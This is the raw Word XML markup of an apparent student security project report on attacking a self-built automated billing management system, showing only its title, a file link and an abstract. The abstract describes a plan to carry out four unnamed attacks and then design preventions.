              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A9E719E" wp14:editId="2B79C684">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40156" name="Group 4015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360" name="Shape 493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1" name="Shape 493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62" name="Shape 493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3" name="Shape 493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64" name="Shape 493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56" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49365" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49366" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49367" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49368" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4936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79C18333" wp14:editId="0FD34626">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40157" name="Group 4015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370" name="Shape 493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1" name="Shape 493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72" name="Shape 493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3" name="Shape 493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74" name="Shape 493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57" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49375" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49376" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49377" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49378" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4937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6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF060C8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HIGH QUALITY DOC LINK:</w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="800080"/>
            <w:sz w:val="18"/>
            <w:u w:val="single" w:color="800080"/>
          </w:rPr>
          <w:t>https://drive.google.com/file/d/1ZX3Q2HqnJjcMUabaCiibDIr5U2CYul</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId12">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="800080"/>
            <w:sz w:val="18"/>
            <w:u w:val="single" w:color="800080"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66BDE4C5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="179"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="800080"/>
            <w:sz w:val="18"/>
            <w:u w:val="single" w:color="800080"/>
          </w:rPr>
          <w:t>P/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="800080"/>
            <w:sz w:val="18"/>
            <w:u w:val="single" w:color="800080"/>
          </w:rPr>
          <w:t>view?usp</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="800080"/>
            <w:sz w:val="18"/>
            <w:u w:val="single" w:color="800080"/>
          </w:rPr>
          <w:t>=</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="800080"/>
            <w:sz w:val="18"/>
            <w:u w:val="single" w:color="800080"/>
          </w:rPr>
          <w:t>share_link</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:b/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1DFE4D2F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE3C1F7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F94FBEC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31914262" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAC858A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718BD419" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C54C28A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB7DA8E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A488327" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADC5BE3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE02E3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8175C3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578F95A1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6C1F86" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="6F2F9F"/>
        </w:rPr>
        <w:t xml:space="preserve">TOPIC NAME: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Exploiting Automated Billing Management System </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61022FF2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="14"/>
        <w:ind w:left="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF62FB5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="111"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc48944"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ABSTRACT:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1E90EF99" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394486F1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1" w:line="230" w:lineRule="auto"/>
        <w:ind w:left="816" w:right="62" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Many concerns about the risk to information associated </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>with  IT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> security, including susceptibility to malware, attacks, viruses, and compromise of web security systems and services. Anyone who uses the internet is vulnerable to security risks. Inadequate IT security of Websites can endanger data integrity and confidentiality and expose private information of users to unauthorized parties.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F99489" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1" w:line="230" w:lineRule="auto"/>
        <w:ind w:left="816" w:right="62" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In this project, the objective is to build an Automated billing Management System and then exploit by carrying out 4 attacks on this system to demonstrate how we can exploit this system. Exposing our Billing Management system will help us know what are the loopholes in our system and help us design certain prevention methods, so that such attacks can be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>prevented .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The main objective of this project revolves around exploiting the billing management system in order to disrupt its functioning. After successfully executing the attacks, identification of the vulnerabilities and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>then  finding</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a suitable strategy to counter it from the future threat. The 4 attacks to be carried out are mentioned below along with their process flow diagrams.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C3FC19" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="71"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAB2AFE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639D18EE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD24751" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3736D4C8" wp14:editId="4D8DC03E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41891" name="Group 4189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380" name="Shape 493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81" name="Shape 493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82" name="Shape 493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83" name="Shape 493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84" name="Shape 493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891" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49385" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49386" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49387" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49388" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4938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5214DE38" wp14:editId="059DE011">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41892" name="Group 4189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390" name="Shape 493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91" name="Shape 493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92" name="Shape 493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93" name="Shape 493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394" name="Shape 493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892" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49395" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49396" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49397" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49398" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4939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6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A06B4A2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C8C41" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AD9EE9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
